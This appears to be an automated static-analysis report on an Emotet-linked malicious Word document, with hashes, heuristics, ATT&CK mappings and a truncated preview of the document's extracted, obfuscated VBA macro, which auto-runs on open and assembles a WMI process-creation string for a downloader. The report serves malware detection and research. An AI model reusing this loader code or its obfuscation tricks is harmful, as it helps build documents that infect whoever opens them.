Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 e11c5acfd7962cbf…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 201.2 KB
Created: 2020-08-19 14:38:00
Authoring application: Microsoft Office Word
First seen: 2020-09-07
MD5: 2c03a2624e0c9679d45f74f905549233
SHA-1: badc22389fc504b9a7189b25585085e8eb0a4ef5
SHA-256: e11c5acfd7962cbfc0d24bd96833b535c52e148b42d4181feae6ea497f2fc228
Risk score: 262

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The Document_open auto-exec macro, combined with a hidden-property command stager and CreateObject calls, strongly suggests that it is designed to execute arbitrary code. The ClamAV detection as 'Doc.Downloader.Emotet-9479964-0' further supports this, indicating downloader functionality, most likely to fetch a second-stage payload. The single embedded URL is benign.

Heuristics (7)

  • ClamAV: Doc.Downloader.Emotet-9479964-0 (critical; CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Emotet-9479964-0
  • VBA macros detected (medium; 4 related findings; OLE_VBA_MACROS)
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager (critical; OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER)
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
  • Document_Open macro (high; OLE_VBA_DOCOPEN)
    Document_Open macro
  • CreateObject call (high; OLE_VBA_CREATEOBJ)
    CreateObject call
  • VBA p-code auto-exec with execution tokens (high; OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL (info; EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 15386 bytes
SHA-256: e118615136836aff33c977cedaa0d4d0494e75f2554244c597c65c224914a388

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "Rmddnsexzmthik7y8"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub _
Document_open()
Ef2kh_dio8c.Z4nhflsu1xpe
End Sub


Attribute VB_Name = "Ef2kh_dio8c"
Attribute VB_Base = "0{650FB411-4F9F-4131-B6E6-425CF8D5BF7B}{47FB0A9A-6124-4BD4-BE9A-A2389BA3585D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Z4nhflsu1xpe()
   C595f28on5b = "979"
If Len("U0p35i_m52d0Eomlb6eqlgo0vq") = Len("Bg3mjukbzis3v2") + 1 Then End
If Len("J10p_nucl083rA5j4vky_3167nydudSa4yagqbsdqnn45") < Len("Rpj0aqwn0jue") Then
        MsgBox "X037nbq_o4c" + "O4vtomcbe_zle"
        MsgBox ("Hpqz3xmbvezsa2o")
        MsgBox "Hwgwqxb5v8rc7" + "Hr353buzbqathq68ml"
End If
If Len("W1desdxnwe6fjfy6Sg_m1wv2w9pw") = Len("Rvfoaihmk1ez0uhk2n") Then
       MsgBox "Pygfmlgdto7fh2x" + "H_6eqy6qq6y2co"
       MsgBox ("Wu7alsp5d6ez0o !!!")
       MsgBox "Y9ld8l7je941zry" + "Bf9awm2l07f3kl"
End If

Drkl2ilu399rjij0c = Ef2kh_dio8c.HelpContextId + 50 + 50
   S8mvp4pa8m9dxf85t = "456"
If Len("Z7jmyasi_7m2fuA98hmuki3e0xvf_") = Len("Y5njvwnjlch4u") + 1 Then End
If Len("Dgnvwh_xg81xshznB_xo83l0pvx7jnrzd_G_u4jlxru9efu9fe5") < Len("Hipcxgxn39ti9oi8d9") Then
        MsgBox "Fnckl2alpd9ejy3" + "Tohmnf8u10la18y6h"
        MsgBox ("Puh0dlx7hj54kvg")
        MsgBox "Mt8wfcqsumqawtq" + "Xxciw4k71s0"
End If
If Len("T8z26epe9wrtd1o3Qkz527xt0_1jb7xe53") = Len("Rzfrdlflgte8ot_c") Then
       MsgBox "G5abbi8e1781" + "Lk92dhr4vtvuq_5dl"
       MsgBox ("A4p6_3xwrjmopjwn !!!")
       MsgBox "V0yp4wpylpr" + "Gcbpf78ovkger1h"
End If

Hj0l51lie_6d = ChrW(Drkl2ilu399rjij0c + (15))
   Afi69jfoqlenf4 = "499"
If Len("Ssixt8enip2Od90vrvo4ingin9xwx") = Len("N8m1ewl0v74aph") + 1 Then End
If Len("Oksmt7upjrfbpZs3v9icio5nkAsai9_04yejev0r") < Len("G_u84wobqs_") Then
        MsgBox "I7z_jnt8jjhb" + "Jlosqmjvfg64n2"
        MsgBox ("D03pa2r3qk7iqv")
        MsgBox "Z3tqplat_g1wg15g7" + "D4kr4b18u9ivd5al"
End If
If Len("Ck9ldeq4jkflQd_wk3ut_s2") = Len("Tclpc8v6u180lcy") Then
       MsgBox "Rt2vwslevsti3xe4g" + "Iceohours8hbkie16"
       MsgBox ("Tg8j2h5uond8wd !!!")
       MsgBox "N2w1kmnafap8thkeb" + "Rba7cl9ux_hovlek3"
End If

Q2rvfhbfk5_d = "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfi111ss[sns ]]d][ jsa nbsb22v2yfnm111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfgm111ss[sns ]]d][ jsa nbsb22v2yft111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf" + Hj0l51lie_6d + "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf:111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfin111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf3111ss[sns ]]d][ jsa nbsb22v2yf2111ss[sns ]]d][ jsa nbsb22v2yf_111ss[sns ]]d][ jsa nbsb22v2yf" + Ef2kh_dio8c.Exm4e742cxztex + "111ss[sns ]]d][ jsa nbsb22v2yfro111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfce111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yf"
   D5hh6pala5hsb8l = "269"
If Len("A9no8t6lgqor7q0T2l0p4mgxtda3fio") = Len("Jktayww_8bpauqv") + 1 Then End
If Len("M2lwmgivh2nq5tahaNfp1ce10t29fddsglY4jhb059jffnah") < Len("R9pp2zg7nxrybyk9yi") Then
        MsgBox "Hiwldr8e7u4g11go" + "C2vz287uul4k"
        MsgBox ("Fseo93dxm95ullur30")
        MsgBox "Ge68y0tl13tge67nl" + "I3olt252eqv"
End If
If Len("C4m9b6mvrppqnU311p0ippgq9wed85") = Len("Soz15g4ba2v") Then
       MsgBox "I00y0baoaxdyofreji" + "Ovm2_gc9u8o0s6"
       MsgBox ("Vs_9gb8qcdlamy !!!")
       MsgBox "S33jam_i_s7errxy" + "V8l0emcpyfkxyf2"
End If

Vwtu87kzkukct = Ccowrdcwmsdz(Q2rvfhbfk5_d)
   Yl9exfrpr_f1zcfd6z = "988"
If Len("Zohz7bpt9mf_5oK59rx6_9s3l_q6") = Len("Knsqiu2wbdhxucl") + 1 Then End
If Len("Illzmgncu0qz9uc
... (truncated)